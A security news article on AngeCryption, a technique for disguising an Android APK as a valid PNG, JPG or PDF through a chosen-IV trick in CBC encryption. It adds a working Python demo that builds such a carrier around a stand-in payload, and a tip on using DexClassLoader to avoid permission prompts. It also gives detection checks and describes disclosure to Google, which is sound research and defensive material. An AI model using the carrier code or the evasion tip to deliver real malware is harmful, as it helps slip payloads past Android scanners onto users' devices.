Android malware distribution through PDF or Image
Security researchers Axelle Apvrille (Fortinet) and Ange Albertini have devised a technique that gives them control over both the input and the output of AES encryption in CBC mode. With that control they built a tool that produces a file which looks to a normal user like a PNG or JPG image or an Adobe document (PDF), yet decrypts into a malicious payload, i.e. malware.
Because the carrier file is a genuinely valid image or document, and the payload exists only after decryption with the right key, the researchers say the technique slips past the malware scanning solutions available for Android.
The researchers named their creation AngeCryption, as it was conceived and written by Ange.
AngeCryption shows that any input can be encrypted into a valid output file (supported carrier formats are PNG, JPG, PDF and FLV) that looks normal to users. Decrypting that output returns the hidden input byte for byte, so the hidden file can be a complete Android application package (APK) carrying whatever the authors wish to deliver to the targeted device.
AngeCryption is available as a Python script on Google Code.
AngeCryption can therefore be used to hide an APK containing malware and deliver it to an unsuspecting user as a valid image or PDF file. It is dangerous because it can deliver almost any payload to any Android version, including the current Android KitKat 4.4.
AngeCryption was presented at Black Hat Europe in Amsterdam last week. In their demonstration, the researchers showed an image of the Star Wars character Anakin Skywalker that was in fact ciphertext produced with the AES algorithm in cipher block chaining (CBC) mode. They said that 3DES can be employed with the same success.
By manipulating the encryption output bytes (in CBC mode the first ciphertext block can be set to anything by choosing the initialisation vector accordingly), the duo made decryption of the Anakin picture yield a different picture, that of Darth Vader, which could be substituted by any other file (a malicious APK, for instance).
Once a carrier image or PDF has been built with the malware inside, a wrapper app that ships the image, decrypts it at runtime and installs or loads the recovered APK completes the infiltration of the user's smartphone or tablet. Packing the malware into the image alone is not enough, however: for the carrier to remain a valid image, its real image data must follow the encrypted package, and after decryption that data ends up appended to the package, after the signature (end-of-central-directory record, EOCD) that marks the end of the compressed file.
This matters because an APK is basically a ZIP archive, and the ZIP format does not permit data beyond the EOCD. Android nevertheless tolerated such a package, and that tolerance is what the technique relies on.
An app built with the present version of AngeCryption triggers permission requests when the hidden APK is installed. These prompts can reveal to a more technical user that a second APK is being deployed in the shadow of the first.
This problem can be overcome in several ways, however; one of them is loading the hidden code with DexClassLoader, which runs it inside the wrapper app without a separate installation and therefore without a new permission prompt.
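The IV trick behind the Anakin/Vader demonstration and the junk that ends up after the EOCD, as an added example that is not the researchers' angecryption.py. To run on the standard library alone it uses an 8-round Feistel network over SHA-256 in place of AES; the trick depends only on CBC, so any block cipher behaves the same. The key, the private chunk name "juNk", the 1x1 image and the "classes.dex" contents are constructed for the example, and, as in the paper, it assumes the image viewer tolerates an unknown ancillary chunk ahead of IHDR.

```python
"""Miniature AngeCryption, re-implemented here for illustration (not the Corkami script):
a file that is a valid-looking PNG on disk yet decrypts, under CBC with a computed IV,
to a ZIP archive (standing in for an APK) followed by junk after its EOCD record."""
import hashlib, io, struct, zipfile, zlib

BLOCK = 16                          # 128-bit blocks, like AES
KEY = b"demo-key-not-secret"        # constructed demo key; any key works
PNG_SIG = b"\x89PNG\r\n\x1a\n"

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

# Stand-in block cipher (8-round Feistel with a SHA-256 round function) so the example
# needs only the standard library; the IV trick depends on CBC alone, so AES drops in.
def _f(key, half, rnd):
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]

def block_encrypt(key, blk):
    l, r = blk[:8], blk[8:]
    for i in range(8):
        l, r = r, _xor(l, _f(key, r, i))
    return l + r

def block_decrypt(key, blk):
    l, r = blk[:8], blk[8:]
    for i in reversed(range(8)):
        l, r = _xor(r, _f(key, l, i)), l
    return l + r

def cbc_encrypt(key, iv, data):
    out, prev = bytearray(), iv
    for i in range(0, len(data), BLOCK):
        prev = block_encrypt(key, _xor(data[i:i + BLOCK], prev))
        out += prev
    return bytes(out)

def cbc_decrypt(key, iv, data):
    out, prev = bytearray(), iv
    for i in range(0, len(data), BLOCK):
        out += _xor(block_decrypt(key, data[i:i + BLOCK]), prev)
        prev = data[i:i + BLOCK]
    return bytes(out)

def angecrypt(key, plaintext, first_cipher_block):
    """CBC gives C1 = E(P1 ^ IV); choosing IV = D(C1) ^ P1 makes C1 whatever we want."""
    iv = _xor(block_decrypt(key, first_cipher_block), plaintext[:BLOCK])
    return iv, cbc_encrypt(key, iv, plaintext)

def png_chunk(ctype, data):
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", zlib.crc32(ctype + data))

def real_png_chunks():
    """IHDR + IDAT + IEND of a constructed 1x1 grey image (the visible picture)."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    idat = zlib.compress(b"\x00\x80")           # filter byte 0, one 8-bit grey pixel
    return png_chunk(b"IHDR", ihdr) + png_chunk(b"IDAT", idat) + png_chunk(b"IEND", b"")

def make_payload_zip():
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("classes.dex", b"hypothetical payload bytes")   # constructed stand-in for the APK
    return buf.getvalue()

def build_carrier(key, payload):
    pt = payload + b"\x00" * (-len(payload) % BLOCK)
    # Ciphertext block 1 = PNG signature + length + type of a private ancillary chunk
    # ("juNk", an invented name) that swallows the rest of the ciphertext; its last 4
    # bytes pose as the CRC, which lenient decoders merely warn about for ancillary
    # chunks. Assumption inherited from the paper: the viewer tolerates it ahead of IHDR.
    first = PNG_SIG + struct.pack(">I", len(pt) - BLOCK - 4) + b"juNk"
    iv, ct = angecrypt(key, pt, first)
    tail = real_png_chunks()
    tail += b"\x00" * (-len(tail) % BLOCK)      # CBC alignment; PNG readers stop at IEND
    return iv, ct + tail                         # the tail decrypts to junk after EOCD

def parse_png_chunks(data):
    """Walk the chunk list as a lenient decoder would and return the chunk types."""
    if not data.startswith(PNG_SIG):
        return []
    pos, types = len(PNG_SIG), []
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        types.append(ctype)
        pos += 12 + length
        if ctype == b"IEND":
            break
    return types

def split_zip_tail(data):
    """Find the EOCD record; return (archive through its comment, bytes appended after)."""
    eocd = data.rfind(b"PK\x05\x06")
    comment_len = struct.unpack("<H", data[eocd + 20:eocd + 22])[0]
    end = eocd + 22 + comment_len
    return data[:end], data[end:]

def recover_payload(key, iv, carrier):
    """What the wrapper app does: decrypt the image and load the APK inside it."""
    archive, junk = split_zip_tail(cbc_decrypt(key, iv, carrier))
    with zipfile.ZipFile(io.BytesIO(archive)) as z:
        return z.read("classes.dex"), len(junk)
```

The carrier from build_carrier opens as a PNG (signature, a junk chunk, then real IHDR/IDAT/IEND) while cbc_decrypt with the computed IV returns the ZIP intact, followed by the decrypted image chunks as trailing bytes. split_zip_tail is also the check a strict APK parser or a scanner can apply: any bytes past the EOCD record and its declared comment are a red flag, exactly the tolerance the researchers reported to Google; on the image side, an unknown chunk before IHDR, or one whose declared length is out of proportion to the picture, is the equivalent signal.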
Proof of Concept (PoC)
The researchers sent a proof of concept demonstrating this type of attack to the Android security team on May 27, 2014. They say Google will fix the issue in a future update of the Android OS. Whether the issue has been fixed in the newly launched Android 5.0 Lollipop is not known.
You can read the entire presentation by Axelle Apvrille and Ange Albertini here (PDF)